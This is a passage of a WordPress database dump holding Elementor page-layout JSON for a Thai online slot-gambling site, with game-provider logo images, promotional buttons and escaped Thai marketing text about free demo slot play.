_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"9ee3b73\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"313c578\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Microgaming_-_Megabet333-Biz.webp\",\"id\":57,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"053c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"60b9d1b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/JILI_-_Megabet333-Biz.webp\",\"id\":54,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d93020a\",\"elType\":\"section\",\"settings\":{\"structure\":\"31\"},\"elements\":[{\"id\":\"68262e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"05f18b4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/JOKER_-_Megabet333-Biz.webp\",\"id\":55,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"268ff30\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"a316455\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Slot_xo_-_Megabet333-Biz.webp\",\"id\":62,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"db9361a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"5a3a81d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Pragmatic_-_Megabet333-Biz.webp\",\"id\":58,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(2123,304,'_thumbnail_id','280'),(2127,305,'_elementor_edit_mode','builder'),(2128,305,'_elementor_template_type','wp-page'),(2129,305,'_elementor_version','3.32.5'),(2130,305,'_elementor_pro_version','3.32.3'),(2131,305,'_wp_page_template','default'),(2132,305,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2133,305,'_elementor_data','[{\"id\":\"598df98\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"1de4a1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"dd4f8a9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Slot_demo_play_-_Megabet333-Biz.webp\",\"id\":61,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aaa47de\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2a7956e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a97ca87\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e1f\\u0e23\\u0e35 \\u0e04\\u0e25\\u0e34\\u0e01!\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"hover_animation\":\"pulse-shrink\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_tilt_direction\":\"negative\",\"_animation\":\"none\",\"link\":{\"url\":\"https:\\/\\/megabetauto.com\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"button_text_color\":\"#FFFFFF\",\"hover_color\":\"#E6C300\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"d82bac9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"763d481\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"hover_animation\":\"pulse-shrink\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_tilt_direction\":\"negative\",\"_animation\":\"none\",\"link\":{\"url\":\"https:\\/\\/amb18b.com\\/promotion\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"hover_color\":\"#E9C500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b45af85\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1bdd864\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6e50ba5\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e23\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\n \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07 API \\u0e41\\u0e17\\u0e49 \\u0e08\\u0e32\\u0e01 USA\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6f8cc97\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-start=\\\"354\\\" data-end=\\\"699\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 megabet \\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e17\\u0e23\\u0e19\\u0e14\\u0e4c\\u0e22\\u0e2d\\u0e14\\u0e2e\\u0e34\\u0e15\\u0e43\\u0e19\\u0e27\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e01\\u0e21\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e17\\u0e32\\u0e07\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e17\\u0e35\\u0e48\\u0e14\\u0e35\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15pg\\u0e1f\\u0e23\\u0e35 \\u0e04\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e38\\u0e13\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e1f\\u0e23\\u0e35\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22 \\u0e17\\u0e38\\u0e01\\u0e40\\u0e01\\u0e21 \\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e07\\u0e34\\u0e19\\u0e01\\u0e48\\u0e2d\\u0e19 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e1d\\u0e36\\u0e01\\u0e1d\\u0e35\\u0e21\\u0e37\\u0e2d \\u0e23\\u0e27\\u0e21\\u0e16\\u0e36\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e25\\u0e2d\\u0e07\\u0e2a\\u0e39\\u0e15\\u0e23\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e46 \\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e15\\u0e23\\u0e07 API \\u0e41\\u0e17\\u0e49\\u0e08\\u0e32\\u0e01 USA \\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e43\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e19\\u0e35\\u0e49 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e21\\u0e35\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e17\\u0e31\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e22 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e40\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e01\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e43\\u0e19\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e15\\u0e48\\u0e32\\u0e07\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e41\\u0e17\\u0e49 \\u0e46 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e20\\u0e32\\u0e1e \\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2d\\u0e31\\u0e15\\u0e23\\u0e32\\u0e01\\u0e32\\u0e23\\u0e41\\u0e15\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a \\u0e17\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e2a\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07\\u0e41\\u0e25\\u0e30\\u0e44\\u0e14\\u0e49\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e42\\u0e25\\u0e01 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e22\\u0e31\\u0e07\\u0e44\\u0e21\\u0e48\\u0e40\\u0e04\\u0e22\\u0e25\\u0e2d\\u0e07\\u0e16\\u0e37\\u0e2d\\u0e27\\u0e48\\u0e32\\u0e1e\\u0e25\\u0e32\\u0e14\\u0e21\\u0e32\\u0e01 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e2d\\u0e07\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e23\\u0e39\\u0e49\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"953f46b\",\"elType\":\"section\",\"settings\":{\"structure\":\"32\"},\"elements\":[{\"id\":\"cca046d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6986c03\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/PG_-_Megabet333-Biz.webp\",\"id\":59,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"9ee3b73\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"313c578\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Microgaming_-_Megabet333-Biz.webp\",\"id\":57,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"053c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"60b9d1b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/JILI_-_Megabet333-Biz.webp\",\"id\":54,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d93020a\",\"elType\":\"section\",\"settings\":{\"structure\":\"31\"},\"elements\":[{\"id\":\"68262e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"05f18b4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/JOKER_-_Megabet333-Biz.webp\",\"id\":55,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"268ff30\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"a316455\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Slot_xo_-_Megabet333-Biz.webp\",\"id\":62,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"db9361a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"5a3a81d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Pragmatic_-_Megabet333-Biz.webp\",\"id\":58,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(2134,305,'_thumbnail_id','280'),(2138,306,'_elementor_edit_mode','builder'),(2139,306,'_elementor_template_type','wp-page'),(2140,306,'_elementor_version','3.32.5'),(2141,306,'_elementor_pro_version','3.32.3'),(2142,306,'_wp_page_template','default'),(2143,306,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2144,306,'_elementor_data','[{\"id\":\"598df98\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"1de4a1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"dd4f8a9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Demo-play-slot-Banner-Yok789.webp\",\"id\":280,\"size\":\"\",\"alt\":\"yok789\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aaa47de\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2a7956e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a97ca87\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e1f\\u0e23\\u0e35 \\u0e04\\u0e25\\u0e34\\u0e01!\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"hover_animation\":\"pulse-shrink\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_tilt_direction\":\"negative\",\"_animation\":\"none\",\"link\":{\"url\":\"https:\\/\\/megabetauto.com\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"button_text_color\":\"#FFFFFF\",\"hover_color\":\"#E6C300\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"d82bac9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"763d481\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"hover_animation\":\"pulse-shrink\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_tilt_direction\":\"negative\",\"_animation\":\"none\",\"link\":{\"url\":\"https:\\/\\/amb18b.com\\/promotion\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"hover_color\":\"#E9C500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b45af85\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1bdd864\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6e50ba5\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\